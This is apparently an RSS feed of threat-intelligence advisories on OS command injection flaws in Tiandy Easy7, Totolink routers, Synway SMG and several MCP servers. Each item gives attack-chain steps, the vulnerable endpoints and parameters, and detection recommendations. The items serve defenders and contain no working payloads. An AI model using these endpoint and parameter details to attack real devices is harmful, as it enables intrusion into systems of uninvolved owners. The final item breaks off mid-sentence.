<?xml version="1.0" encoding="utf-8" standalone="yes"?><rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom" xmlns:content="http://purl.org/rss/1.0/modules/content/"><channel><title>Command Injection — CraftedSignal Threat Feed</title><link>https://feed.craftedsignal.io/tags/command-injection/</link><description>Trending threats, MITRE ATT&amp;CK coverage, and detection metadata — refreshed continuously.</description><generator>Hugo</generator><language>en</language><managingEditor>hello@craftedsignal.io</managingEditor><webMaster>hello@craftedsignal.io</webMaster><lastBuildDate>Sun, 03 May 2026 14:16:27 +0000</lastBuildDate><atom:link href="https://feed.craftedsignal.io/tags/command-injection/feed.xml" rel="self" type="application/rss+xml"/><item><title>Tiandy Easy7 Integrated Management Platform OS Command Injection Vulnerability</title><link>https://feed.craftedsignal.io/briefs/2026-05-tiandy-command-injection/</link><pubDate>Sun, 03 May 2026 14:16:27 +0000</pubDate><author>hello@craftedsignal.io</author><guid isPermaLink="true">https://feed.craftedsignal.io/briefs/2026-05-tiandy-command-injection/</guid><description>CVE-2026-7698 allows for remote OS command injection in Tiandy Easy7 Integrated Management Platform 7.17.0 via manipulation of the 'week' argument in the /Easy7/rest/systemInfo/updateDbBackupInfo file.</description><content:encoded><![CDATA[<p>A critical vulnerability, CVE-2026-7698, has been identified in Tiandy Easy7 Integrated Management Platform version 7.17.0. This vulnerability resides within the <code>/Easy7/rest/systemInfo/updateDbBackupInfo</code> file, specifically related to the <code>week</code> argument. Successful exploitation allows for arbitrary OS command injection. This vulnerability is remotely exploitable, meaning an attacker can trigger it over the network without needing local access. Publicly available exploit code exists, increasing the likelihood of exploitation. The vendor was notified but has not responded. Defenders should take immediate action to mitigate this risk.</p>
<h2 id="attack-chain">Attack Chain</h2>
<ol>
<li>An attacker identifies a vulnerable Tiandy Easy7 Integrated Management Platform running version 7.17.0.</li>
<li>The attacker crafts a malicious HTTP request targeting the <code>/Easy7/rest/systemInfo/updateDbBackupInfo</code> endpoint.</li>
<li>The crafted request includes a payload within the <code>week</code> argument designed to inject OS commands.</li>
<li>The vulnerable application fails to properly sanitize or validate the <code>week</code> argument.</li>
<li>The application executes the injected OS command with the privileges of the web server.</li>
<li>The attacker gains arbitrary code execution on the server.</li>
<li>The attacker can then perform further actions such as installing malware, exfiltrating data, or pivoting to other systems on the network.</li>
</ol>
<h2 id="impact">Impact</h2>
<p>Successful exploitation of CVE-2026-7698 allows an attacker to execute arbitrary commands on the affected system. This could lead to complete system compromise, data breaches, denial of service, or further lateral movement within the network. Given the publicly available exploit, organizations using Tiandy Easy7 Integrated Management Platform 7.17.0 are at immediate risk.</p>
<h2 id="recommendation">Recommendation</h2>
<ul>
<li>Apply available patches from Tiandy if they become available.</li>
<li>Monitor web server logs for requests to <code>/Easy7/rest/systemInfo/updateDbBackupInfo</code> containing suspicious characters or command injection attempts. Deploy the Sigma rule <code>Detect Suspicious Requests to updateDbBackupInfo</code> to your SIEM.</li>
<li>Implement input validation and sanitization on the <code>week</code> argument within the <code>/Easy7/rest/systemInfo/updateDbBackupInfo</code> endpoint.</li>
<li>Monitor process creation events for unusual processes spawned by the web server, using the Sigma rule <code>Detect OS Command Injection via Web Request</code>.</li>
<li>Review and restrict network access to the Tiandy Easy7 Integrated Management Platform to only authorized users and systems.</li>
</ul>
]]></content:encoded><category domain="severity">critical</category><category domain="type">advisory</category><category>cve-2026-7698</category><category>command-injection</category><category>web-application</category></item><item><title>OS Command Injection Vulnerability in p_69_branch_monkey_mcp Preview Endpoint (CVE-2026-7590)</title><link>https://feed.craftedsignal.io/briefs/2026-05-branch-monkey-mcp-command-injection/</link><pubDate>Sat, 02 May 2026 12:00:00 +0000</pubDate><author>hello@craftedsignal.io</author><guid isPermaLink="true">https://feed.craftedsignal.io/briefs/2026-05-branch-monkey-mcp-command-injection/</guid><description>A remote attacker can inject OS commands by manipulating the dev_script argument in the Preview Endpoint of eyal-gor's p_69_branch_monkey_mcp (up to commit 69bc71874ce40050ef45fde5a435855f18af3373), leading to arbitrary code execution on the server.</description><content:encoded><![CDATA[<p>A critical OS command injection vulnerability, CVE-2026-7590, has been identified in the Preview Endpoint of eyal-gor&rsquo;s p_69_branch_monkey_mcp. This vulnerability affects versions up to commit 69bc71874ce40050ef45fde5a435855f18af3373. A remote attacker can exploit this flaw by manipulating the <code>dev_script</code> argument within the <code>branch_monkey_mcp/bridge_and_local_actions/routes/advanced.py</code> file.  Successful exploitation allows for arbitrary command execution on the host operating system. The exploit is publicly available, increasing the risk of widespread exploitation. The vendor has been notified but has not yet responded. The lack of versioning makes it difficult to determine the exact scope of affected installations.</p>
<h2 id="attack-chain">Attack Chain</h2>
<ol>
<li>The attacker identifies a vulnerable instance of p_69_branch_monkey_mcp running a web server.</li>
<li>The attacker crafts a malicious HTTP request targeting the Preview Endpoint.</li>
<li>The request includes a payload in the <code>dev_script</code> argument designed to inject OS commands via the <code>branch_monkey_mcp/bridge_and_local_actions/routes/advanced.py</code> file.</li>
<li>The web server processes the request, passing the attacker-controlled <code>dev_script</code> argument to a function that executes system commands without proper sanitization.</li>
<li>The injected OS command is executed by the server, potentially with the privileges of the web server user. For example, an attacker could inject <code>ls -la</code> to list directory contents.</li>
<li>The output of the injected command is returned to the attacker via the web server&rsquo;s response, confirming successful command execution.</li>
<li>The attacker leverages the initial command execution to escalate privileges, install persistent backdoors, or move laterally within the network, depending on the server&rsquo;s configuration and accessible resources.</li>
<li>The attacker achieves their final objective, such as data exfiltration, system compromise, or denial of service.</li>
</ol>
<h2 id="impact">Impact</h2>
<p>Successful exploitation of CVE-2026-7590 allows a remote attacker to execute arbitrary OS commands on the affected server. This could lead to complete system compromise, including data theft, malware installation, and denial of service. The lack of version information makes it difficult to ascertain the number of vulnerable installations, but given the publicly available exploit, widespread exploitation is possible. Organizations using p_69_branch_monkey_mcp are at high risk.</p>
<h2 id="recommendation">Recommendation</h2>
<ul>
<li>Monitor web server logs for suspicious requests targeting the Preview Endpoint and containing potentially malicious payloads in the <code>dev_script</code> parameter as described in the attack chain. Use the &ldquo;p_69_branch_monkey_mcp_command_injection&rdquo; Sigma rule.</li>
<li>Inspect process creation events for unexpected processes spawned by the web server, indicating potential command injection. Use the &ldquo;p_69_branch_monkey_mcp_unexpected_process&rdquo; Sigma rule.</li>
<li>Implement input validation and sanitization on the <code>dev_script</code> parameter in the <code>branch_monkey_mcp/bridge_and_local_actions/routes/advanced.py</code> file to prevent command injection.</li>
<li>Although specific vulnerable versions are unavailable, immediately investigate and patch any instances of <code>p_69_branch_monkey_mcp</code> due to the public exploit availability.</li>
</ul>
]]></content:encoded><category domain="severity">critical</category><category domain="type">advisory</category><category>command-injection</category><category>web-application</category><category>cve</category></item><item><title>Sunwood-ai-labs command-executor-mcp-server OS Command Injection Vulnerability</title><link>https://feed.craftedsignal.io/briefs/2026-05-sunwood-command-injection/</link><pubDate>Fri, 01 May 2026 21:16:17 +0000</pubDate><author>hello@craftedsignal.io</author><guid isPermaLink="true">https://feed.craftedsignal.io/briefs/2026-05-sunwood-command-injection/</guid><description>CVE-2026-7593 is an OS command injection vulnerability in Sunwood-ai-labs command-executor-mcp-server up to version 0.1.0, allowing remote attackers to execute arbitrary commands via the execute_command function in src/index.ts.</description><content:encoded><![CDATA[<p>A critical security vulnerability, identified as CVE-2026-7593, affects Sunwood-ai-labs command-executor-mcp-server versions up to 0.1.0. This vulnerability resides within the <code>execute_command</code> function of the <code>src/index.ts</code> file, a component of the MCP Interface. Successful exploitation allows a remote attacker to inject and execute arbitrary operating system commands on the server. The vulnerability has been publicly disclosed, making it a high-risk issue for systems running the affected software. The vendor was notified through an issue report but has not yet responded, potentially increasing the window of opportunity for attackers. Defenders should prioritize patching or mitigating this vulnerability to prevent unauthorized command execution and potential system compromise.</p>
<h2 id="attack-chain">Attack Chain</h2>
<ol>
<li>Attacker identifies a vulnerable instance of Sunwood-ai-labs command-executor-mcp-server running version 0.1.0 or earlier.</li>
<li>The attacker crafts a malicious request targeting the <code>execute_command</code> function within the MCP Interface.</li>
<li>The malicious request includes an OS command injection payload.</li>
<li>The <code>execute_command</code> function in <code>src/index.ts</code> fails to properly sanitize or neutralize the input, passing it directly to the operating system.</li>
<li>The operating system executes the attacker-supplied command with the privileges of the server process.</li>
<li>The attacker gains arbitrary code execution on the server.</li>
<li>The attacker can then use this access to perform further actions such as escalating privileges, installing malware, or exfiltrating sensitive data.</li>
</ol>
<h2 id="impact">Impact</h2>
<p>Successful exploitation of CVE-2026-7593 allows an attacker to execute arbitrary commands on the affected server. This could lead to complete system compromise, including data theft, service disruption, or the deployment of malicious software. Given the ease of exploitation and the public availability of exploit code, organizations using the vulnerable Sunwood-ai-labs command-executor-mcp-server are at significant risk. While the exact number of affected installations is unknown, the potential impact is severe due to the possibility of full remote control over the compromised server.</p>
<h2 id="recommendation">Recommendation</h2>
<ul>
<li>Apply any available patches or updates from Sunwood-ai-labs to address CVE-2026-7593.</li>
<li>Implement input validation and sanitization measures within the <code>execute_command</code> function to prevent OS command injection.</li>
<li>Deploy the Sigma rule <code>Detect Suspicious Command Execution via MCP Server</code> to identify potential exploitation attempts (see below).</li>
<li>Monitor network traffic for suspicious requests targeting the MCP Interface, specifically those containing command injection payloads.</li>
</ul>
]]></content:encoded><category domain="severity">high</category><category domain="type">advisory</category><category>cve-2026-7593</category><category>command-injection</category><category>webserver</category></item><item><title>Totolink NR1800X Command Injection Vulnerability</title><link>https://feed.craftedsignal.io/briefs/2026-05-totolink-command-injection/</link><pubDate>Fri, 01 May 2026 03:16:01 +0000</pubDate><author>hello@craftedsignal.io</author><guid isPermaLink="true">https://feed.craftedsignal.io/briefs/2026-05-totolink-command-injection/</guid><description>A command injection vulnerability exists in Totolink NR1800X version 9.1.0u.6279_B20210910, affecting the function sub_41A68C of the file /cgi-bin/cstecgi.cgi; by manipulating the argument setUssd, a remote attacker can inject commands, and an exploit is publicly available.</description><content:encoded><![CDATA[<p>A command injection vulnerability, identified as CVE-2026-7548, affects Totolink NR1800X router version 9.1.0u.6279_B20210910. The vulnerability resides within the <code>sub_41A68C</code> function of the <code>/cgi-bin/cstecgi.cgi</code> file. By manipulating the <code>setUssd</code> argument, a remote attacker can inject arbitrary commands into the system. Publicly available exploit code makes exploitation easier. This vulnerability poses a significant risk as it allows unauthenticated remote attackers to execute arbitrary commands on the affected device, potentially leading to full system compromise.</p>
<h2 id="attack-chain">Attack Chain</h2>
<ol>
<li>The attacker identifies a vulnerable Totolink NR1800X device running firmware version 9.1.0u.6279_B20210910.</li>
<li>The attacker sends a crafted HTTP request to the <code>/cgi-bin/cstecgi.cgi</code> endpoint.</li>
<li>The HTTP request includes the <code>setUssd</code> argument with a malicious payload designed to inject a command.</li>
<li>The <code>sub_41A68C</code> function processes the <code>setUssd</code> argument without proper sanitization.</li>
<li>The injected command is executed by the system with the privileges of the web server process.</li>
<li>The attacker gains initial access and can execute arbitrary commands on the device.</li>
<li>The attacker may then use the command execution to escalate privileges, install malware, or pivot to other devices on the network.</li>
</ol>
<h2 id="impact">Impact</h2>
<p>Successful exploitation of this vulnerability allows an attacker to execute arbitrary commands on the affected Totolink NR1800X router. This could lead to complete compromise of the device, allowing the attacker to control network traffic, modify router settings, or use the router as a pivot point to attack other devices on the network. Given the wide usage of Totolink routers, a large number of devices could be vulnerable.</p>
<h2 id="recommendation">Recommendation</h2>
<ul>
<li>Monitor web server logs for requests to <code>/cgi-bin/cstecgi.cgi</code> containing suspicious characters or command injection attempts in the <code>setUssd</code> parameter, using the Sigma rule provided below.</li>
<li>Implement rate limiting on the <code>/cgi-bin/cstecgi.cgi</code> endpoint to mitigate brute-force exploitation attempts.</li>
<li>Apply available patches provided by Totolink to address the CVE-2026-7548 vulnerability.</li>
<li>Deploy the Sigma rule to your SIEM and tune for your environment.</li>
</ul>
]]></content:encoded><category domain="severity">critical</category><category domain="type">advisory</category><category>command-injection</category><category>router</category><category>network</category></item><item><title>Synway SMG Gateway Management Software Unauthenticated OS Command Injection</title><link>https://feed.craftedsignal.io/briefs/2026-05-synway-smg-rce/</link><pubDate>Thu, 30 Apr 2026 17:16:25 +0000</pubDate><author>hello@craftedsignal.io</author><guid isPermaLink="true">https://feed.craftedsignal.io/briefs/2026-05-synway-smg-rce/</guid><description>Synway SMG Gateway Management Management Software is vulnerable to unauthenticated OS command injection via crafted POST requests to the RADIUS configuration endpoint, leading to remote code execution.</description><content:encoded><![CDATA[<p>Synway SMG Gateway Management Software is susceptible to an OS command injection vulnerability (CVE-2025-71284) within the RADIUS configuration endpoint. An unauthenticated remote attacker can exploit this flaw by sending a specially crafted POST request to <code>/en/9-2radius.php</code>. The vulnerability lies in the improper sanitization of the <code>radius_address</code> POST parameter, which is directly incorporated into a <code>sed</code> command. The Shadowserver Foundation observed the first exploitation evidence on 2025-07-11 (UTC). Successful exploitation allows the attacker to execute arbitrary shell commands on the affected system, potentially compromising the entire gateway. This vulnerability poses a significant risk to organizations using the Synway SMG Gateway, as it enables unauthenticated remote code execution.</p>
<h2 id="attack-chain">Attack Chain</h2>
<ol>
<li>An unauthenticated attacker identifies a Synway SMG Gateway Management Software instance exposed to the network.</li>
<li>The attacker crafts a malicious POST request targeting the <code>/en/9-2radius.php</code> endpoint.</li>
<li>The POST request includes parameters such as <code>radius_address</code>, <code>radius_address2</code>, <code>shared_secret2</code>, <code>source_ip</code>, <code>timeout</code>, or <code>retry</code> along with <code>save=1</code> and <code>enable_radius=1</code>.</li>
<li>The <code>radius_address</code> parameter contains an OS command injection payload.</li>
<li>The application improperly sanitizes the <code>radius_address</code> parameter and incorporates it into a <code>sed</code> command.</li>
<li>The injected command is executed by the operating system, granting the attacker arbitrary code execution privileges.</li>
<li>The attacker establishes a reverse shell to maintain persistence and expand their foothold.</li>
<li>The attacker pivots within the network, gaining access to sensitive data or systems, and potentially establishing a long-term presence.</li>
</ol>
<h2 id="impact">Impact</h2>
<p>Successful exploitation of this vulnerability allows an unauthenticated attacker to execute arbitrary commands on the Synway SMG Gateway. This could lead to complete system compromise, data theft, disruption of services, and further propagation of attacks within the network. Given the high CVSS score (9.8), this vulnerability represents a critical threat. The number of affected systems and organizations is currently unknown.</p>
<h2 id="recommendation">Recommendation</h2>
<ul>
<li>Deploy the Sigma rule &ldquo;Synway SMG Gateway Radius Command Injection Attempt&rdquo; to your SIEM to detect exploitation attempts based on suspicious POST requests to the vulnerable endpoint.</li>
<li>Apply input validation and sanitization to the <code>radius_address</code>, <code>radius_address2</code>, <code>shared_secret2</code>, <code>source_ip</code>, <code>timeout</code>, and <code>retry</code> parameters in the RADIUS configuration endpoint.</li>
<li>Monitor web server logs for POST requests to <code>/en/9-2radius.php</code> containing suspicious characters or command sequences indicative of command injection attacks to activate the &ldquo;Synway SMG Gateway Radius Command Injection Attempt&rdquo; rule.</li>
</ul>
]]></content:encoded><category domain="severity">critical</category><category domain="type">advisory</category><category>command-injection</category><category>rce</category><category>network</category></item><item><title>VetCoders mcp-server-semgrep OS Command Injection Vulnerability</title><link>https://feed.craftedsignal.io/briefs/2026-05-vetcoders-command-injection/</link><pubDate>Thu, 30 Apr 2026 00:17:01 +0000</pubDate><author>hello@craftedsignal.io</author><guid isPermaLink="true">https://feed.craftedsignal.io/briefs/2026-05-vetcoders-command-injection/</guid><description>VetCoders mcp-server-semgrep version 1.0.0 is vulnerable to remote OS command injection due to manipulation of the ID argument in several functions of the MCP Interface component.</description><content:encoded><![CDATA[<p>A critical OS command injection vulnerability has been identified in VetCoders mcp-server-semgrep version 1.0.0. The vulnerability resides within the MCP Interface component, specifically affecting the <code>analyze_results</code>, <code>filter_results</code>, <code>export_results</code>, <code>compare_results</code>, <code>scan_directory</code>, and <code>create_rule</code> functions in the <code>src/index.ts</code> file. Successful exploitation allows for remote attackers to inject and execute arbitrary operating system commands on the affected system. The vulnerability is publicly known and actively exploitable. VetCoders has released version 1.0.1 to address this issue, with patch <code>141335da044e53c3f5b315e0386e01238405b771</code> containing the fix. Defenders should prioritize upgrading to version 1.0.1 to mitigate this risk.</p>
<h2 id="attack-chain">Attack Chain</h2>
<ol>
<li>The attacker identifies a vulnerable instance of VetCoders mcp-server-semgrep version 1.0.0.</li>
<li>The attacker crafts a malicious request targeting one of the vulnerable functions: <code>analyze_results</code>, <code>filter_results</code>, <code>export_results</code>, <code>compare_results</code>, <code>scan_directory</code>, or <code>create_rule</code>.</li>
<li>The malicious request includes a manipulated <code>ID</code> argument designed to inject OS commands.</li>
<li>The application fails to properly sanitize or validate the <code>ID</code> argument.</li>
<li>The application executes the injected OS command using a function such as <code>exec</code>, <code>system</code>, or equivalent within the affected functions in <code>src/index.ts</code>.</li>
<li>The injected command executes with the privileges of the mcp-server-semgrep process.</li>
<li>The attacker gains arbitrary code execution on the server.</li>
<li>The attacker can then perform actions such as data exfiltration, lateral movement, or denial of service.</li>
</ol>
<h2 id="impact">Impact</h2>
<p>Successful exploitation of this vulnerability allows a remote attacker to execute arbitrary operating system commands on the affected server. This could lead to complete system compromise, including data theft, modification, or destruction. Depending on the server&rsquo;s role and the attacker&rsquo;s objectives, this could result in significant financial loss, reputational damage, and disruption of services. There is no information about specific victim counts or targeted sectors.</p>
<h2 id="recommendation">Recommendation</h2>
<ul>
<li>Upgrade to VetCoders mcp-server-semgrep version 1.0.1 to remediate the vulnerability as identified in CVE-2026-7446.</li>
<li>Monitor web server logs for suspicious requests targeting the <code>/src/index.ts</code> file with unusual or potentially malicious input in the <code>ID</code> argument, using the Sigma rules provided.</li>
<li>Implement input validation and sanitization for all user-supplied input, especially the <code>ID</code> parameter, to prevent command injection attacks.</li>
</ul>
]]></content:encoded><category domain="severity">high</category><category domain="type">advisory</category><category>command-injection</category><category>vulnerability</category><category>mcp-server-semgrep</category></item><item><title>PolarVista xcode-mcp-server OS Command Injection Vulnerability</title><link>https://feed.craftedsignal.io/briefs/2026-04-polarvista-command-injection/</link><pubDate>Wed, 29 Apr 2026 22:16:22 +0000</pubDate><author>hello@craftedsignal.io</author><guid isPermaLink="true">https://feed.craftedsignal.io/briefs/2026-04-polarvista-command-injection/</guid><description>PolarVista xcode-mcp-server 1.0.0 is vulnerable to remote OS command injection via manipulation of the Request argument in the `build_project/run_tests` function, allowing attackers to execute arbitrary commands on the server.</description><content:encoded><![CDATA[<p>PolarVista xcode-mcp-server version 1.0.0 is vulnerable to OS command injection (CVE-2026-7416). This vulnerability exists in the <code>build_project/run_tests</code> function within the <code>src/index.ts</code> file of the MCP Interface component. An attacker can remotely inject operating system commands by manipulating the Request argument. The vulnerability has been publicly disclosed, increasing the risk of exploitation. The vendor has been notified but has not yet responded, leaving systems exposed. This poses a significant risk to organizations using this software, as successful exploitation allows complete system compromise.</p>
<h2 id="attack-chain">Attack Chain</h2>
<ol>
<li>The attacker identifies a vulnerable instance of PolarVista xcode-mcp-server 1.0.0.</li>
<li>The attacker crafts a malicious request targeting the <code>build_project/run_tests</code> function in <code>src/index.ts</code>.</li>
<li>The malicious request includes an OS command injection payload within the Request argument.</li>
<li>The application fails to properly sanitize or validate the Request argument.</li>
<li>The application executes the injected OS command on the server.</li>
<li>The attacker gains arbitrary code execution on the server, potentially escalating privileges.</li>
<li>The attacker installs malware, such as a reverse shell, to maintain persistent access.</li>
<li>The attacker performs reconnaissance, lateral movement, and data exfiltration within the compromised network.</li>
</ol>
<h2 id="impact">Impact</h2>
<p>Successful exploitation of this vulnerability allows a remote attacker to execute arbitrary operating system commands on the affected server. This can lead to complete system compromise, data breaches, and denial of service. There are no reported victims or sectors targeted at this time, but given the ease of exploitation and public availability, the risk is high.</p>
<h2 id="recommendation">Recommendation</h2>
<ul>
<li>Apply available patches from PolarVista as soon as they are released to remediate CVE-2026-7416.</li>
<li>Implement input validation and sanitization for the Request argument in the <code>build_project/run_tests</code> function to prevent command injection.</li>
<li>Monitor web server logs for suspicious requests targeting the <code>build_project/run_tests</code> endpoint.</li>
<li>Deploy the Sigma rule &ldquo;Detect Suspicious xcode-mcp-server Requests&rdquo; to identify potential exploitation attempts.</li>
</ul>
]]></content:encoded><category domain="severity">critical</category><category domain="type">advisory</category><category>command-injection</category><category>vulnerability</category><category>xcode-mcp-server</category></item><item><title>Totolink A8000RU OS Command Injection Vulnerability</title><link>https://feed.craftedsignal.io/briefs/2026-04-totolink-rce/</link><pubDate>Tue, 28 Apr 2026 09:17:41 +0000</pubDate><author>hello@craftedsignal.io</author><guid isPermaLink="true">https://feed.craftedsignal.io/briefs/2026-04-totolink-rce/</guid><description>Totolink A8000RU version 7.1cu.643_b20200521 is vulnerable to OS command injection via manipulation of the `wifiOff` argument in the `setWiFiBasicCfg` function of the `/cgi-bin/cstecgi.cgi` CGI handler, allowing a remote attacker to execute arbitrary commands on the system.</description><content:encoded><![CDATA[<p>A critical vulnerability, CVE-2026-7241, has been identified in Totolink A8000RU router firmware version 7.1cu.643_b20200521. This vulnerability resides within the CGI Handler component, specifically in the <code>setWiFiBasicCfg</code> function of the <code>/cgi-bin/cstecgi.cgi</code> file. Successful exploitation allows a remote attacker to inject and execute arbitrary operating system commands by manipulating the <code>wifiOff</code> argument. The vulnerability has been publicly disclosed, increasing the risk of exploitation. This poses a significant threat to users of the affected router model, potentially leading to complete system compromise.</p>
<h2 id="attack-chain">Attack Chain</h2>
<ol>
<li>The attacker identifies a Totolink A8000RU router running firmware version 7.1cu.643_b20200521.</li>
<li>The attacker sends a crafted HTTP request to the <code>/cgi-bin/cstecgi.cgi</code> endpoint.</li>
<li>The HTTP request targets the <code>setWiFiBasicCfg</code> function.</li>
<li>The attacker injects malicious OS commands into the <code>wifiOff</code> argument of the HTTP request.</li>
<li>The CGI handler processes the request without proper sanitization of the <code>wifiOff</code> argument.</li>
<li>The injected OS commands are executed by the system with the privileges of the web server.</li>
<li>The attacker gains remote shell access or performs other malicious actions, such as modifying router settings.</li>
</ol>
<h2 id="impact">Impact</h2>
<p>Successful exploitation of this vulnerability allows a remote attacker to execute arbitrary operating system commands on the affected Totolink A8000RU router. This can lead to complete compromise of the device, potentially enabling the attacker to eavesdrop on network traffic, modify router configuration, or use the router as a node in a botnet. Given the widespread use of Totolink routers, a successful attack could impact numerous home and small business networks.</p>
<h2 id="recommendation">Recommendation</h2>
<ul>
<li>Deploy the Sigma rule &ldquo;Detect Totolink A8000RU Command Injection Attempt&rdquo; to your SIEM to identify exploitation attempts targeting the vulnerable endpoint.</li>
<li>Apply the Sigma rule &ldquo;Detect Suspicious CGI Request Arguments&rdquo; to identify unusual commands in cgi requests.</li>
<li>Monitor web server logs for requests to <code>/cgi-bin/cstecgi.cgi</code> with suspicious characters or commands in the <code>wifiOff</code> parameter, as this is the attack vector described in CVE-2026-7241.</li>
</ul>
]]></content:encoded><category domain="severity">critical</category><category domain="type">advisory</category><category>cve-2026-7241</category><category>command-injection</category><category>router</category></item><item><title>Totolink A8000RU Command Injection Vulnerability (CVE-2026-7244)</title><link>https://feed.craftedsignal.io/briefs/2026-04-totolink-command-injection/</link><pubDate>Tue, 28 Apr 2026 09:16:17 +0000</pubDate><author>hello@craftedsignal.io</author><guid isPermaLink="true">https://feed.craftedsignal.io/briefs/2026-04-totolink-command-injection/</guid><description>A critical OS command injection vulnerability (CVE-2026-7244) exists in the setWiFiEasyGuestCfg function of the /cgi-bin/cstecgi.cgi file in Totolink A8000RU version 7.1cu.643_b20200521, allowing remote attackers to execute arbitrary commands.</description><content:encoded><![CDATA[<p>A critical security vulnerability, identified as CVE-2026-7244, has been discovered in Totolink A8000RU router firmware version 7.1cu.643_b20200521. This flaw resides within the CGI handler, specifically in the <code>setWiFiEasyGuestCfg</code> function located in the <code>/cgi-bin/cstecgi.cgi</code> file. By manipulating the <code>merge</code> argument, a remote attacker can inject and execute arbitrary operating system commands on the affected device. The vulnerability is remotely exploitable and a proof-of-concept exploit has been publicly released, increasing the risk of widespread exploitation. This poses a significant threat as it allows for complete control over the device, potentially leading to data breaches, network compromise, and botnet recruitment.</p>
<h2 id="attack-chain">Attack Chain</h2>
<ol>
<li>The attacker sends a malicious HTTP request to the <code>/cgi-bin/cstecgi.cgi</code> endpoint on the Totolink A8000RU router.</li>
<li>The request targets the <code>setWiFiEasyGuestCfg</code> function.</li>
<li>The attacker crafts the request to include a payload in the <code>merge</code> argument designed to inject an OS command.</li>
<li>The <code>cstecgi.cgi</code> script processes the request and passes the <code>merge</code> argument to a system call without proper sanitization.</li>
<li>The injected OS command is executed with the privileges of the web server.</li>
<li>The attacker gains arbitrary code execution on the router&rsquo;s operating system.</li>
<li>The attacker can then install malware, change router settings, or use the router as a pivot point to attack other devices on the network.</li>
</ol>
<h2 id="impact">Impact</h2>
<p>Successful exploitation of CVE-2026-7244 grants an attacker complete control over the vulnerable Totolink A8000RU router. This can lead to a variety of malicious activities, including data exfiltration, denial-of-service attacks, and the installation of persistent backdoors. Given the availability of a public exploit, a large number of devices could be compromised quickly. This could result in widespread botnet infections, impacting home users and small businesses relying on these routers for network connectivity.</p>
<h2 id="recommendation">Recommendation</h2>
<ul>
<li>Monitor web server logs for requests to <code>/cgi-bin/cstecgi.cgi</code> with suspicious parameters in the query string, especially related to the <code>merge</code> argument to detect exploitation attempts (see rule: &ldquo;Detect Totolink A8000RU Command Injection Attempt&rdquo;).</li>
<li>Implement network intrusion detection system (NIDS) rules to identify malicious payloads being sent to the affected endpoint (see rule: &ldquo;Detect Totolink A8000RU Command Injection - Network&rdquo;).</li>
<li>Apply the Sigma rule &ldquo;Detect Totolink A8000RU Command Injection in Logs&rdquo; to your SIEM to identify successful command injection attempts based on web server logs.</li>
<li>Monitor for unusual process execution originating from the web server process, indicating potential exploitation.</li>
<li>Unfortunately, a patch is not available so consider migrating to a more secure router.</li>
</ul>
]]></content:encoded><category domain="severity">critical</category><category domain="type">advisory</category><category>command injection</category><category>router vulnerability</category><category>cve-2026-7244</category></item><item><title>Totolink A8000RU OS Command Injection Vulnerability (CVE-2026-7240)</title><link>https://feed.craftedsignal.io/briefs/2026-04-totolink-cmd-injection/</link><pubDate>Tue, 28 Apr 2026 08:16:02 +0000</pubDate><author>hello@craftedsignal.io</author><guid isPermaLink="true">https://feed.craftedsignal.io/briefs/2026-04-totolink-cmd-injection/</guid><description>CVE-2026-7240 is a critical OS command injection vulnerability in the Totolink A8000RU router that allows remote attackers to execute arbitrary commands by manipulating the 'User' argument in the 'setVpnAccountCfg' function.</description><content:encoded><![CDATA[<p>A critical vulnerability, CVE-2026-7240, has been identified in Totolink A8000RU router firmware version 7.1cu.643_b20200521. This flaw resides within the CGI Handler component, specifically in the <code>setVpnAccountCfg</code> function of the <code>/cgi-bin/cstecgi.cgi</code> file. By exploiting this vulnerability, a remote attacker can inject arbitrary operating system commands by manipulating the <code>User</code> argument. Publicly available exploit code exists, increasing the risk of widespread exploitation. This vulnerability poses a significant threat as it allows complete control of the affected device, potentially leading to network compromise and data exfiltration.</p>
<h2 id="attack-chain">Attack Chain</h2>
<ol>
<li>The attacker identifies a Totolink A8000RU router running firmware version 7.1cu.643_b20200521 accessible via the web interface.</li>
<li>The attacker crafts a malicious HTTP request targeting the <code>/cgi-bin/cstecgi.cgi</code> endpoint.</li>
<li>The crafted request includes the <code>setVpnAccountCfg</code> function call with a payload injected into the <code>User</code> argument. The payload contains OS commands to be executed on the router.</li>
<li>The router&rsquo;s CGI Handler processes the request without proper sanitization of the <code>User</code> argument.</li>
<li>The injected OS commands are executed with the privileges of the web server process.</li>
<li>The attacker gains remote shell access to the router.</li>
<li>The attacker leverages the compromised router to pivot within the network, potentially accessing sensitive data or other internal systems.</li>
<li>The attacker could modify the router&rsquo;s configuration, intercept network traffic, or use it as a launching point for further attacks.</li>
</ol>
<h2 id="impact">Impact</h2>
<p>Successful exploitation of CVE-2026-7240 allows a remote, unauthenticated attacker to execute arbitrary commands on the affected Totolink A8000RU router. This could lead to a complete compromise of the device, potentially exposing sensitive information, enabling unauthorized network access, and facilitating further attacks within the network. Given the ease of exploitation and the availability of public exploits, organizations using this router model are at high risk of experiencing significant security breaches.</p>
<h2 id="recommendation">Recommendation</h2>
<ul>
<li>Deploy the Sigma rule <code>Detect Totolink A8000RU Command Injection Attempt</code> to identify exploitation attempts against vulnerable Totolink routers. Enable webserver logging to capture the necessary request data.</li>
<li>Apply the Sigma rule <code>Detect Totolink A8000RU Malicious User Agent</code> to detect potential exploit attempts based on modified User-Agent headers.</li>
<li>Monitor webserver logs for requests to <code>/cgi-bin/cstecgi.cgi</code> containing suspicious characters or command sequences in the <code>cs-uri-query</code> field, indicative of command injection attempts.</li>
<li>Given the public availability of exploit code, organizations using the Totolink A8000RU 7.1cu.643_b20200521 are advised to replace the device if a patch is not available from the vendor.</li>
</ul>
]]></content:encoded><category domain="severity">critical</category><category domain="type">advisory</category><category>cve-2026-7240</category><category>command-injection</category><category>totolink</category><category>router</category><category>cgi</category></item><item><title>dvladimirov MCP Git Search API Command Injection Vulnerability</title><link>https://feed.craftedsignal.io/briefs/2026-04-mcp-command-injection/</link><pubDate>Tue, 28 Apr 2026 01:16:02 +0000</pubDate><author>hello@craftedsignal.io</author><guid isPermaLink="true">https://feed.craftedsignal.io/briefs/2026-04-mcp-command-injection/</guid><description>A command injection vulnerability (CVE-2026-7211) exists in the GitSearchRequest function of dvladimirov MCP up to version 0.1.0, allowing a remote attacker to execute arbitrary commands by manipulating the repo_url or pattern argument.</description><content:encoded><![CDATA[<p>A command injection vulnerability has been identified in dvladimirov MCP (Monitoring and Configuration Platform) up to version 0.1.0. This vulnerability resides within the GitSearchRequest function located in the <code>mcp_server.py</code> file, specifically affecting the Git Search API component. Successful exploitation allows a remote attacker to inject and execute arbitrary commands on the underlying system. The vulnerability stems from insufficient sanitization of user-supplied input to the <code>repo_url</code> or <code>pattern</code> arguments. Publicly available exploits exist, increasing the risk of active exploitation. The project 